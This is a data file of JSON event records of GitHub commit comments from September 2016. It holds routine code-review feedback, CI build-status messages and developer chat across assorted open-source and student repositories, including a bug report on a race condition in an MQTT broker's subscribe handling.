{"id":"4617585274","type":"CommitCommentEvent","actor":{"login":"macool"},"repo":{"name":"noggalito/porttare-frontend"},"payload":{"comment":{"id":19171783,"position":57,"line":92,"path":"app/scripts/controllers/clients-controller.js","commit_id":"c255bdb4c87e36095101c1c5c6cae9a1554b6710","created_at":"2016-09-26T12:53:37Z","updated_at":"2016-09-26T12:53:37Z","body":"https://github.com/noggalito/porttare-backend/blob/master/app/controllers/api/provider/clients_controller.rb#L93 no responde nada; sólo un header que te dice que borró (204) http://guides.rubyonrails.org/layouts_and_rendering.html#the-status-option"}},"created_at":"2016-09-26T12:53:37Z"}
{"id":"4617585909","type":"CommitCommentEvent","actor":{"login":"macool"},"repo":{"name":"noggalito/porttare-frontend"},"payload":{"comment":{"id":19171784,"position":57,"line":92,"path":"app/scripts/controllers/clients-controller.js","commit_id":"c255bdb4c87e36095101c1c5c6cae9a1554b6710","created_at":"2016-09-26T12:53:44Z","updated_at":"2016-09-26T12:53:44Z","body":"@fabricioflores "}},"created_at":"2016-09-26T12:53:44Z"}
{"id":"4617586258","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"MehulSangham/Assignment_02_RelaxrLanding"},"payload":{"comment":{"id":19171786,"position":69,"line":69,"path":"css/style.css","commit_id":"a6fc5edf89c378f5cb5513b3110d4230e216d6e8","created_at":"2016-09-26T12:53:48Z","updated_at":"2016-09-26T12:53:48Z","body":"Got an extra character here."}},"created_at":"2016-09-26T12:53:48Z"}
{"id":"4617589953","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19171795,"position":null,"line":null,"path":null,"commit_id":"01ccfd77505966a1e6d416a18f017f4f8c2af9c0","created_at":"2016-09-26T12:54:32Z","updated_at":"2016-09-26T12:54:32Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1163](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14245&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 251, ignored: 3 Build time: 00:13:17"}},"created_at":"2016-09-26T12:54:32Z"}
{"id":"4617596723","type":"CommitCommentEvent","actor":{"login":"meemsbror"},"repo":{"name":"meemsbror/DAT255"},"payload":{"comment":{"id":19171807,"position":null,"line":null,"path":null,"commit_id":"d1153045084c91f174857e507fb0d1ddebf077be","created_at":"2016-09-26T12:55:50Z","updated_at":"2016-09-26T12:55:50Z","body":"Har försökt ett tag asså, inte lyckats :P jävla shit"}},"created_at":"2016-09-26T12:55:50Z"}
{"id":"4617598630","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"MehulSangham/Assignment_02_RelaxrLanding"},"payload":{"comment":{"id":19171808,"position":22,"line":22,"path":"index.html","commit_id":"a6fc5edf89c378f5cb5513b3110d4230e216d6e8","created_at":"2016-09-26T12:56:12Z","updated_at":"2016-09-26T12:56:12Z","body":"I would use an h1 for this title. (Helps to have one for SEO)."}},"created_at":"2016-09-26T12:56:12Z"}
{"id":"4617602313","type":"CommitCommentEvent","actor":{"login":"sjrd"},"repo":{"name":"scala-js/scala-js"},"payload":{"comment":{"id":19171821,"position":19,"line":2305,"path":"compiler/src/main/scala/org/scalajs/core/compiler/GenJSCode.scala","commit_id":"5c5eb2bc6ce8b8fee87a1fae9bce30e3b88520b5","created_at":"2016-09-26T12:56:55Z","updated_at":"2016-09-26T12:56:55Z","body":"Indeed. I was looking for `isTraitConstructor` and couldn't find it ;)"}},"created_at":"2016-09-26T12:56:55Z"}
{"id":"4617604147","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"MehulSangham/Assignment_02_RelaxrLanding"},"payload":{"comment":{"id":19171824,"position":71,"line":71,"path":"index.html","commit_id":"a6fc5edf89c378f5cb5513b3110d4230e216d6e8","created_at":"2016-09-26T12:57:18Z","updated_at":"2016-09-26T12:57:18Z","body":"Got an extra element here that's adding extra space to your space. Let's remove this."}},"created_at":"2016-09-26T12:57:18Z"}
{"id":"4617604321","type":"CommitCommentEvent","actor":{"login":"tdi-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":19171826,"position":4,"line":101,"path":"addons/account/views/account_payment_view.xml","commit_id":"c055e64535510333f3a59483d4b15db26a227eaf","created_at":"2016-09-26T12:57:20Z","updated_at":"2016-09-26T12:57:20Z","body":"I hope I got it right this time coach:\r\nhttps://github.com/odoo-dev/odoo/commit/03ab277997041501d46e8fbf5d02675e8aab338a"}},"created_at":"2016-09-26T12:57:20Z"}
{"id":"4617605924","type":"CommitCommentEvent","actor":{"login":"SomewhatDisoriented"},"repo":{"name":"meemsbror/DAT255"},"payload":{"comment":{"id":19171832,"position":null,"line":null,"path":null,"commit_id":"d1153045084c91f174857e507fb0d1ddebf077be","created_at":"2016-09-26T12:57:40Z","updated_at":"2016-09-26T12:57:40Z","body":"Näe riktigt störande, verkar som den fortsätter komma med i commits tills man tar bort filen från repot :^)"}},"created_at":"2016-09-26T12:57:40Z"}
{"id":"4617607370","type":"CommitCommentEvent","actor":{"login":"juliangruber"},"repo":{"name":"datproject/dat.land"},"payload":{"comment":{"id":19171836,"position":4,"line":11,"path":"server/router.js","commit_id":"fb0a73bbfdd5b02aa85287d1fafbf3b9e4c5378f","created_at":"2016-09-26T12:57:57Z","updated_at":"2016-09-26T12:57:57Z","body":"```js\r\nconst svgSprite = fs.readFileSync(require.resolve('dat-design/public/svg/sprite.svg'), 'utf8')\r\n```"}},"created_at":"2016-09-26T12:57:57Z"}
{"id":"4617610786","type":"CommitCommentEvent","actor":{"login":"Robinlovelace"},"repo":{"name":"csgillespie/efficientR"},"payload":{"comment":{"id":19171845,"position":null,"line":null,"path":null,"commit_id":"efeb50f9737a8fcbe691c162abdb672cb667c678","created_at":"2016-09-26T12:58:37Z","updated_at":"2016-09-26T12:58:37Z","body":"Just tested it and it works perfect on Linux - and RStudio preview version even gives correct highlighting (didn't work before). We could include this screenshot or similar:\r\n\r\n![screenshot from 2016-09-26 13-57-19](https://cloud.githubusercontent.com/assets/1825120/18835084/51d94316-83f1-11e6-8256-194f849b8fe5.png)\r\n"}},"created_at":"2016-09-26T12:58:37Z"}
{"id":"4617610919","type":"CommitCommentEvent","actor":{"login":"catacraciun"},"repo":{"name":"Mangopay/mangopay2-nodejs-sdk"},"payload":{"comment":{"id":19171847,"position":null,"line":null,"path":null,"commit_id":"b12d4b552535622e69ea94e1abea32e661e5374e","created_at":"2016-09-26T12:58:39Z","updated_at":"2016-09-26T12:58:39Z","body":"@hobailey Not yet, we are doing code review, then we will let you know :)"}},"created_at":"2016-09-26T12:58:39Z"}
{"id":"4617611012","type":"CommitCommentEvent","actor":{"login":"happybin92"},"repo":{"name":"happybin92/mosca"},"payload":{"comment":{"id":19171848,"position":null,"line":null,"path":null,"commit_id":"bf13aeb7e57a2838c01473c95cfd97db5adc0666","created_at":"2016-09-26T12:58:40Z","updated_at":"2016-09-26T12:58:40Z","body":"## Case\r\n- Start a mqtt-client\r\n- Then, this client send 3 subscribe messages with an same topic “test”, continuously\r\n- Then, this client unsubscribe this topic \"test\"\r\n\r\nBut I find that, sometimes. it can't unsubscribe successfully and also receive message with topic \"test\".  \r\n\r\n**Specially**, if the _authorizeSubscribe_ function called with a lot of time, this case would must take place.\r\n\r\n## Analysis\r\nwe can find the processing line of subscribing in mosca.\r\n\r\n> one subscribe message\r\n  => topic of subscribe\r\n  => authorizeSubscribe \r\n  => ascoltatore.subscribe (add callback)\r\n  => fill in client.subscriptions[topic]\r\n\r\nso, for a subscribe topic, it  construct a callback function that filled in the client.subscriptions[topic] and stored in ascoltatore. (Except unsubscribing this topic and then delete it)\r\nFor an exist subscribe topic, it has an judgement in function _handleEachSub_ in _client.js_ to avoid the same topic callback before _authorizeSubscribe_.\r\n> if (this.subscriptions[s.topic] === undefined) \r\n\r\n**But,** if we continuously send multi subscribe messages with an same topic, They will all pass upper judgement, and add **multi callback** to ascoltatore, and  fill in client.subscriptions[topic] at last. That will cause that we can't move all the callback in ascoltatore when unsubscribe. (trie_ascoltatore)\r\n\r\n## Fix it\r\nBefore storing in ascoltatore.subscribe and filling in client.subscriptions, we should check the judgement again and change client.subscriptions next,  to ensure that register only one callback. It like a Lock.\r\n```\r\nif (this.subscriptions[s.topic] === undefined) {\r\n    this.subscriptions[s.topic] = { qos: s.qos, handler: handler };\r\n    this.server.ascoltatore.subscribe(\r\n      s.topic,\r\n      handler,\r\n      function(err) {\r\n        if (err) {\r\n          delete that.subscriptions[s.topic];\r\n          cb(err);\r\n          return;\r\n        }\r\n        that.logger.info({ topic: s.topic, qos: s.qos }, \"subscribed to topic\");\r\n        cb(null, true);\r\n      }\r\n    );\r\n```"}},"created_at":"2016-09-26T12:58:40Z"}
{"id":"4617614785","type":"CommitCommentEvent","actor":{"login":"hobailey"},"repo":{"name":"Mangopay/mangopay2-nodejs-sdk"},"payload":{"comment":{"id":19171852,"position":null,"line":null,"path":null,"commit_id":"b12d4b552535622e69ea94e1abea32e661e5374e","created_at":"2016-09-26T12:59:25Z","updated_at":"2016-09-26T12:59:25Z","body":"Ah ok, I didn't know that was your process. No rush. Thanks :-)"}},"created_at":"2016-09-26T12:59:25Z"}
{"id":"4617618857","type":"CommitCommentEvent","actor":{"login":"wangshan"},"repo":{"name":"wangshan/hnjobs"},"payload":{"comment":{"id":19171859,"position":7,"line":35,"path":"gulpfile.js","commit_id":"bc938a356785bd67f66dd3055e9de0588f7d76d8","created_at":"2016-09-26T13:00:13Z","updated_at":"2016-09-26T13:00:13Z","body":"something something"}},"created_at":"2016-09-26T13:00:13Z"}
{"id":"4617620538","type":"CommitCommentEvent","actor":{"login":"NateWr"},"repo":{"name":"pkp/pkp-lib"},"payload":{"comment":{"id":19171862,"position":null,"line":null,"path":null,"commit_id":"9ed15622fce94a95762d89dccbf369ca9d03ccee","created_at":"2016-09-26T13:00:31Z","updated_at":"2016-09-26T13:00:31Z","body":"@crism Sorry for the late reply. I've been on holiday. The `spectrum` files are added as a git submodule.\r\n\r\nhttps://github.com/pkp/pkp-lib/commit/9ed15622fce94a95762d89dccbf369ca9d03ccee#diff-8903239df476d7401cf9e76af0252622R7\r\n\r\nYou may need to run `git submodule update --init` after this commit to ensure you have the files locally."}},"created_at":"2016-09-26T13:00:31Z"}
{"id":"4617621705","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19171864,"position":null,"line":null,"path":null,"commit_id":"fca1b2593dc95044f75005fbf3663253b7574361","created_at":"2016-09-26T13:00:44Z","updated_at":"2016-09-26T13:00:44Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1164](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14247&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-26T13:00:44Z"}
{"id":"4617623095","type":"CommitCommentEvent","actor":{"login":"sanzinger"},"repo":{"name":"sanzinger/tunsocks"},"payload":{"comment":{"id":19171865,"position":null,"line":null,"path":null,"commit_id":"2ecfde38c57493b58edb88e2e8677e98dba889fc","created_at":"2016-09-26T13:00:57Z","updated_at":"2016-09-26T13:00:57Z","body":"Brilliant!"}},"created_at":"2016-09-26T13:00:57Z"}
{"id":"4617623199","type":"CommitCommentEvent","actor":{"login":"base99"},"repo":{"name":"wangshan/hnjobs"},"payload":{"comment":{"id":19171867,"position":7,"line":35,"path":"gulpfile.js","commit_id":"bc938a356785bd67f66dd3055e9de0588f7d76d8","created_at":"2016-09-26T13:00:58Z","updated_at":"2016-09-26T13:00:58Z","body":"more something"}},"created_at":"2016-09-26T13:00:58Z"}
{"id":"4617626009","type":"CommitCommentEvent","actor":{"login":"sanzinger"},"repo":{"name":"sanzinger/tunsocks"},"payload":{"comment":{"id":19171873,"position":null,"line":null,"path":null,"commit_id":"9934672da106592699ae65216865def3dcca1e96","created_at":"2016-09-26T13:01:29Z","updated_at":"2016-09-26T13:01:29Z","body":"Brilliant!"}},"created_at":"2016-09-26T13:01:29Z"}
{"id":"4617627807","type":"CommitCommentEvent","actor":{"login":"brnikita"},"repo":{"name":"soshace/EOP-2"},"payload":{"comment":{"id":19171875,"position":6,"line":74,"path":"routes.js","commit_id":"5dd5e6228f2167b0ac9ba72e1a12be622fc9cc88","created_at":"2016-09-26T13:01:50Z","updated_at":"2016-09-26T13:01:50Z","body":"Используйте CamelCase"}},"created_at":"2016-09-26T13:01:50Z"}
{"id":"4617631066","type":"CommitCommentEvent","actor":{"login":"brnikita"},"repo":{"name":"soshace/EOP-2"},"payload":{"comment":{"id":19171890,"position":8,"line":76,"path":"routes.js","commit_id":"5dd5e6228f2167b0ac9ba72e1a12be622fc9cc88","created_at":"2016-09-26T13:02:30Z","updated_at":"2016-09-26T13:02:30Z","body":"Старайтесь использовать полные название переменных, где это возможно."}},"created_at":"2016-09-26T13:02:30Z"}
{"id":"4617631795","type":"CommitCommentEvent","actor":{"login":"thoughtjunky"},"repo":{"name":"thoughtjunky/KeyTechBITPE"},"payload":{"comment":{"id":19171894,"position":null,"line":null,"path":null,"commit_id":"c56ce3ad4a7fc6ac764f29d76b85331820ac918e","created_at":"2016-09-26T13:02:38Z","updated_at":"2016-09-26T13:02:38Z","body":"woah, apparently I forgot to commit this."}},"created_at":"2016-09-26T13:02:38Z"}
{"id":"4617633404","type":"CommitCommentEvent","actor":{"login":"brnikita"},"repo":{"name":"soshace/EOP-2"},"payload":{"comment":{"id":19171899,"position":10,"line":78,"path":"routes.js","commit_id":"5dd5e6228f2167b0ac9ba72e1a12be622fc9cc88","created_at":"2016-09-26T13:02:57Z","updated_at":"2016-09-26T13:02:57Z","body":"Тело условий оборачивайте в фигурные скобки"}},"created_at":"2016-09-26T13:02:57Z"}
{"id":"4617634300","type":"CommitCommentEvent","actor":{"login":"Tosha1409"},"repo":{"name":"Tosha1409/resizer"},"payload":{"comment":{"id":19171902,"position":null,"line":null,"path":null,"commit_id":"c6bc107b4b7899a4359519f69ea5c78ce525e9f0","created_at":"2016-09-26T13:03:07Z","updated_at":"2016-09-26T13:03:07Z","body":"Resizing script itself. for more info check read me."}},"created_at":"2016-09-26T13:03:07Z"}
{"id":"4617636014","type":"CommitCommentEvent","actor":{"login":"CollectorsCorner"},"repo":{"name":"biocompute-objects/HTS-CSRS"},"payload":{"comment":{"id":19171905,"position":null,"line":null,"path":null,"commit_id":"2c539593d725b994d6c75f9ce91cfc06fd8dd39f","created_at":"2016-09-26T13:03:25Z","updated_at":"2016-09-26T13:03:25Z","body":"URL for disease ontology added"}},"created_at":"2016-09-26T13:03:25Z"}
{"id":"4617636298","type":"CommitCommentEvent","actor":{"login":"bravesirrobin81"},"repo":{"name":"hmrc/agent-client-authorisation"},"payload":{"comment":{"id":19171906,"position":72,"line":72,"path":"invitations.raml","commit_id":"871ec7123e8571e49b817cf05e882e88264b84aa","created_at":"2016-09-26T13:03:28Z","updated_at":"2016-09-26T13:03:28Z","body":"Good question. My initial thought was 401, but 403 could apply. Do you have a d6?"}},"created_at":"2016-09-26T13:03:28Z"}
{"id":"4617638560","type":"CommitCommentEvent","actor":{"login":"balat"},"repo":{"name":"ocsigen/eliom"},"payload":{"comment":{"id":19171912,"position":null,"line":null,"path":null,"commit_id":"73f5df267ca54ba0e7e5f8819dfac77262687299","created_at":"2016-09-26T13:03:55Z","updated_at":"2016-09-26T13:03:55Z","body":"It is not very convenient not to have the same type on client and server.\r\nI need to write the interface twice ..."}},"created_at":"2016-09-26T13:03:55Z"}
{"id":"4617639100","type":"CommitCommentEvent","actor":{"login":"wikimatze"},"repo":{"name":"wikimatze/vimfiles"},"payload":{"comment":{"id":19171916,"position":null,"line":null,"path":null,"commit_id":"a3bfbd91d2e0ff698f892774ff3b5024135de01c","created_at":"2016-09-26T13:04:02Z","updated_at":"2016-09-26T13:04:02Z","body":"Macht alles Sinn! Was willst du denn damit machen?"}},"created_at":"2016-09-26T13:04:02Z"}
{"id":"4617641694","type":"CommitCommentEvent","actor":{"login":"pmario"},"repo":{"name":"Jermolene/TiddlyWiki5"},"payload":{"comment":{"id":19171921,"position":13,"line":13,"path":"core/ui/AdvancedSearch/FilterButtons/dropdown.tid","commit_id":"8bc0633b6ff1b6031a15e65b2bc5e70f9bd3df73","created_at":"2016-09-26T13:04:33Z","updated_at":"2016-09-26T13:04:33Z","body":"Those wrappers in line 12 and 13 seem to be redundant and cause problems with the \"position\" attribute of the reveal widget. ... adding the classes like so: \r\n\r\n```\r\n<$reveal state=<<qualify \"$:/state/filterDropdown\">> type=\"popup\" position=\"belowleft\" animate=\"yes\" class=\"tc-block-dropdown tc-edit-type-dropdown tc-block-dropdown-wrapper\">\r\n```\r\n\r\nimo has the same effect and \"position\" works. "}},"created_at":"2016-09-26T13:04:33Z"}
{"id":"4617642737","type":"CommitCommentEvent","actor":{"login":"MOZGIII"},"repo":{"name":"isolo/version-manager"},"payload":{"comment":{"id":19171923,"position":41,"line":23,"path":"version-manager.gemspec","commit_id":"84099c871f4cfd654f783a41bf2f177358057858","created_at":"2016-09-26T13:04:47Z","updated_at":"2016-09-26T13:04:47Z","body":"Use `spec.add_dependency` instead of `spec.add_development_dependency`"}},"created_at":"2016-09-26T13:04:47Z"}
{"id":"4617646702","type":"CommitCommentEvent","actor":{"login":"CedricReichenbach"},"repo":{"name":"swagger-api/swagger-core"},"payload":{"comment":{"id":19171930,"position":120,"line":148,"path":"modules/swagger-jaxrs/src/main/java/io/swagger/jaxrs/config/SwaggerContextService.java","commit_id":"451d6c20a6368e5f6acb2f241d6c5a7efbc7a071","created_at":"2016-09-26T13:05:32Z","updated_at":"2016-09-26T13:05:32Z","body":"Why is the Swagger instance read from servlet context here, but never written to (as far as I can see)?\r\n\r\nLooks like this \"caching\" of the Swagger instance should have been moved here from `ApiListingResource`, but the set part was accidentally dropped. Or am I missing something?"}},"created_at":"2016-09-26T13:05:32Z"}
{"id":"4617648890","type":"CommitCommentEvent","actor":{"login":"DiegoPino"},"repo":{"name":"fubhy/graphql-drupal"},"payload":{"comment":{"id":19171937,"position":54,"line":54,"path":"tests/src/Kernel/QueryTestBase.php","commit_id":"956f817d041f210241a677bcf73f6ed173722667","created_at":"2016-09-26T13:05:58Z","updated_at":"2016-09-26T13:05:58Z","body":"Hi, this ampersands seems to be a typo (maybe)."}},"created_at":"2016-09-26T13:05:58Z"}
{"id":"4617657350","type":"CommitCommentEvent","actor":{"login":"artfulrobot"},"repo":{"name":"artfulrobot/uk.co.vedaconsulting.mailchimp"},"payload":{"comment":{"id":19171952,"position":null,"line":null,"path":null,"commit_id":"2b9cd6484a8d1007ef52b22997f515cd35933d48","created_at":"2016-09-26T13:07:38Z","updated_at":"2016-09-26T13:07:38Z","body":"pls see https://github.com/artfulrobot/uk.co.vedaconsulting.mailchimp/commit/aa859bbcf28596ff9d255a6a2c67c53d7a1768f6"}},"created_at":"2016-09-26T13:07:38Z"}
{"id":"4617661328","type":"CommitCommentEvent","actor":{"login":"astoellis"},"repo":{"name":"astoellis/material-timepicker"},"payload":{"comment":{"id":19171964,"position":4,"line":5,"path":"src/js/template.js","commit_id":"23fc06386c2e40690f675edf7ebf23a976b17f34","created_at":"2016-09-26T13:08:22Z","updated_at":"2016-09-26T13:08:22Z","body":"Well thank you kindly! I'll definitely submit a PR"}},"created_at":"2016-09-26T13:08:22Z"}
{"id":"4617661485","type":"CommitCommentEvent","actor":{"login":"waldyrious"},"repo":{"name":"mnapoli/IsItMaintained"},"payload":{"comment":{"id":19171966,"position":null,"line":null,"path":null,"commit_id":"9c71c18c756d2b7e3613e144a871deeb7d3e3a12","created_at":"2016-09-26T13:08:24Z","updated_at":"2016-09-26T13:08:24Z","body":"Thanks for the clarification. Could you add that info to the readme? I was confused since I saw no public discussion about this."}},"created_at":"2016-09-26T13:08:24Z"}
{"id":"4617663461","type":"CommitCommentEvent","actor":{"login":"danbohea"},"repo":{"name":"hashbangcode/vlad"},"payload":{"comment":{"id":19171969,"position":null,"line":null,"path":null,"commit_id":"c9a419ae7453578069fc40656123356e8c68a541","created_at":"2016-09-26T13:08:47Z","updated_at":"2016-09-26T13:08:47Z","body":"Oops, this doesn't \"fix\" #366 at all but it's certainly part of the solution."}},"created_at":"2016-09-26T13:08:47Z"}
{"id":"4617670244","type":"CommitCommentEvent","actor":{"login":"mariusc"},"repo":{"name":"iOS-Goodies/iOS-Goodies"},"payload":{"comment":{"id":19171988,"position":null,"line":null,"path":null,"commit_id":"ddbeabdf1b7af0430213de571f7246cefedc3429","created_at":"2016-09-26T13:10:06Z","updated_at":"2016-09-26T13:10:06Z","body":"Not sure if this should go into business or extra; fell free to move it around wherever you think it fits"}},"created_at":"2016-09-26T13:10:06Z"}
{"id":"4617672705","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"mjocel/relaxr-landing-page"},"payload":{"comment":{"id":19171993,"position":44,"line":44,"path":"css/style.css","commit_id":"7c5515b8fe053cacaea15fcb34d44785b34007d2","created_at":"2016-09-26T13:10:32Z","updated_at":"2016-09-26T13:10:32Z","body":"looks like you've got this set twice and there's an extra comma here. Also, you could have consolidated these like this:\r\n\r\n```\r\na, a:link, a:visited, a:hover, a:active {\r\n text-decoration: none;\r\n}\r\n```\r\n\r\nNB. The \"focus\" pseudo-selector only applies to form elements.\r\n"}},"created_at":"2016-09-26T13:10:32Z"}
{"id":"4617673314","type":"CommitCommentEvent","actor":{"login":"fenix008"},"repo":{"name":"RPCS3/rpcs3"},"payload":{"comment":{"id":19171997,"position":null,"line":null,"path":null,"commit_id":"7884356e90ebd443b1f527516ec7d2bef5ad5be3","created_at":"2016-09-26T13:10:38Z","updated_at":"2016-09-26T13:10:38Z","body":"woohoo, with your commit just appear some improve! (about textures sure!)\r\nhttps://puu.sh/rkkdS/fc2f81e002.jpg (old)\r\nhttp://puu.sh/rooMx/dc10d5ebd5.jpg (now)\r\n"}},"created_at":"2016-09-26T13:10:38Z"}
{"id":"4617678633","type":"CommitCommentEvent","actor":{"login":"Rubbertjuh"},"repo":{"name":"KaiKikuchi/GriefPreventionPlus"},"payload":{"comment":{"id":19172019,"position":null,"line":null,"path":null,"commit_id":"bb5152587fabc980713f5b97f0d59bc9529fc08b","created_at":"2016-09-26T13:11:41Z","updated_at":"2016-09-26T13:11:41Z","body":"Could you possibly at a configurable delay to this command?\r\nIf players constantly teleport without Delay, it might cause lag spikes. \r\nWe have 3s delays on all of our teleports. \r\n\r\nGreat addition btw 💯 "}},"created_at":"2016-09-26T13:11:41Z"}
{"id":"4617679250","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"mjocel/relaxr-landing-page"},"payload":{"comment":{"id":19172021,"position":144,"line":144,"path":"css/style.css","commit_id":"7c5515b8fe053cacaea15fcb34d44785b34007d2","created_at":"2016-09-26T13:11:47Z","updated_at":"2016-09-26T13:11:47Z","body":"Let's be more descriptive with our class names so it's easier to know which section you're referring to."}},"created_at":"2016-09-26T13:11:47Z"}
{"id":"4617679675","type":"CommitCommentEvent","actor":{"login":"Ginkgoes-in-Summer"},"repo":{"name":"Ginkgoes-in-Summer/Mystring"},"payload":{"comment":{"id":19172023,"position":null,"line":null,"path":null,"commit_id":"8d9c709cb30c51610794f762255c965179a0ea02","created_at":"2016-09-26T13:11:52Z","updated_at":"2016-09-26T13:11:52Z","body":"Connect 2 strings."}},"created_at":"2016-09-26T13:11:52Z"}
{"id":"4617682285","type":"CommitCommentEvent","actor":{"login":"RundRundus"},"repo":{"name":"meemsbror/DAT255"},"payload":{"comment":{"id":19172030,"position":null,"line":null,"path":null,"commit_id":"d1153045084c91f174857e507fb0d1ddebf077be","created_at":"2016-09-26T13:12:20Z","updated_at":"2016-09-26T13:12:20Z","body":"Man blir typ så [här](https://pornhub.com) glad!"}},"created_at":"2016-09-26T13:12:20Z"}
{"id":"4617682958","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19172032,"position":null,"line":null,"path":null,"commit_id":"fca1b2593dc95044f75005fbf3663253b7574361","created_at":"2016-09-26T13:12:29Z","updated_at":"2016-09-26T13:12:29Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1164](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14247&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 252, ignored: 3 Build time: 00:11:44"}},"created_at":"2016-09-26T13:12:29Z"}
{"id":"4617685313","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"mjocel/relaxr-landing-page"},"payload":{"comment":{"id":19172037,"position":149,"line":149,"path":"css/style.css","commit_id":"7c5515b8fe053cacaea15fcb34d44785b34007d2","created_at":"2016-09-26T13:12:55Z","updated_at":"2016-09-26T13:12:55Z","body":"This could have been added to your \"content\" container instead of on each individual module. Also adding `margin: 0 auto;` would have centered it on the page."}},"created_at":"2016-09-26T13:12:55Z"}
{"id":"4617685843","type":"CommitCommentEvent","actor":{"login":"cristina-david"},"repo":{"name":"cristina-david/cbmc"},"payload":{"comment":{"id":19172038,"position":4,"line":9,"path":"src/cbmc/bmc_cover.cpp","commit_id":"04f511ffdcd53ac094179bdb2580ecf9cf4c91b6","created_at":"2016-09-26T13:13:01Z","updated_at":"2016-09-26T13:13:01Z","body":"Done."}},"created_at":"2016-09-26T13:13:01Z"}
{"id":"4617686264","type":"CommitCommentEvent","actor":{"login":"hbeachey"},"repo":{"name":"ndlib/honeycomb"},"payload":{"comment":{"id":19172039,"position":7,"line":12,"path":"app/controllers/showcases_controller.rb","commit_id":"66f725c6378ffc4eb9c82705eac1d8a2bb457931","created_at":"2016-09-26T13:13:06Z","updated_at":"2016-09-26T13:13:06Z","body":"Done!"}},"created_at":"2016-09-26T13:13:06Z"}
{"id":"4617686290","type":"CommitCommentEvent","actor":{"login":"tguillem"},"repo":{"name":"robUx4/vlc"},"payload":{"comment":{"id":19172040,"position":73,"line":1260,"path":"src/video_output/display.c","commit_id":"1f1751b7c485c522e4bdd422a8bf63f6842293ff","created_at":"2016-09-26T13:13:06Z","updated_at":"2016-09-26T13:13:06Z","body":"Why not using osys->lock ?"}},"created_at":"2016-09-26T13:13:06Z"}
{"id":"4617686371","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":19172042,"position":null,"line":null,"path":null,"commit_id":"08cef33ef96edb76beb0fb0cf86f0d656cb6d396","created_at":"2016-09-26T13:13:07Z","updated_at":"2016-09-26T13:13:07Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#J_RUVTbwT9KTuoN9-pwHyg"}},"created_at":"2016-09-26T13:13:07Z"}
{"id":"4617686993","type":"CommitCommentEvent","actor":{"login":"cristina-david"},"repo":{"name":"cristina-david/cbmc"},"payload":{"comment":{"id":19172046,"position":52,"line":167,"path":"src/cbmc/bmc_cover.cpp","commit_id":"04f511ffdcd53ac094179bdb2580ecf9cf4c91b6","created_at":"2016-09-26T13:13:13Z","updated_at":"2016-09-26T13:13:13Z","body":"The input vectors contain the covered goals, which are always sorted."}},"created_at":"2016-09-26T13:13:13Z"}
{"id":"4617689085","type":"CommitCommentEvent","actor":{"login":"nonoillora"},"repo":{"name":"nonoillora/url4everupdate"},"payload":{"comment":{"id":19172052,"position":null,"line":null,"path":null,"commit_id":"a4108977f0bef2f7739a67196ebddc330d8ea96c","created_at":"2016-09-26T13:13:32Z","updated_at":"2016-09-26T13:13:32Z","body":"update readme"}},"created_at":"2016-09-26T13:13:32Z"}
{"id":"4617689745","type":"CommitCommentEvent","actor":{"login":"sombhupal"},"repo":{"name":"sombhupal/first"},"payload":{"comment":{"id":19172055,"position":null,"line":null,"path":null,"commit_id":"4e4180d654b441355858db74c0d9e0ac24fc1b35","created_at":"2016-09-26T13:13:39Z","updated_at":"2016-09-26T13:13:39Z","body":"comment on 26 this september"}},"created_at":"2016-09-26T13:13:39Z"}
{"id":"4617690377","type":"CommitCommentEvent","actor":{"login":"cristina-david"},"repo":{"name":"cristina-david/cbmc"},"payload":{"comment":{"id":19172056,"position":88,"line":203,"path":"src/cbmc/bmc_cover.cpp","commit_id":"04f511ffdcd53ac094179bdb2580ecf9cf4c91b6","created_at":"2016-09-26T13:13:47Z","updated_at":"2016-09-26T13:13:47Z","body":"The coverage goals that we remove are already covered by previous tests. So although we might indeed under-report the coverage obtained by individual tests, I don't think that's important. We want to know what is the coverage improvement achieved by each test, rather than the absolute coverage. Moreover, this was also the case in the previous version of the code, see line 262 where I commented out the removal of already covered goals. I added a comment to that line."}},"created_at":"2016-09-26T13:13:47Z"}
{"id":"4617690694","type":"CommitCommentEvent","actor":{"login":"cristina-david"},"repo":{"name":"cristina-david/cbmc"},"payload":{"comment":{"id":19172057,"position":91,"line":206,"path":"src/cbmc/bmc_cover.cpp","commit_id":"04f511ffdcd53ac094179bdb2580ecf9cf4c91b6","created_at":"2016-09-26T13:13:51Z","updated_at":"2016-09-26T13:13:51Z","body":"Done."}},"created_at":"2016-09-26T13:13:51Z"}
{"id":"4617692604","type":"CommitCommentEvent","actor":{"login":"mnapoli"},"repo":{"name":"mnapoli/IsItMaintained"},"payload":{"comment":{"id":19172061,"position":null,"line":null,"path":null,"commit_id":"9c71c18c756d2b7e3613e144a871deeb7d3e3a12","created_at":"2016-09-26T13:14:13Z","updated_at":"2016-09-26T13:14:13Z","body":"Done"}},"created_at":"2016-09-26T13:14:13Z"}
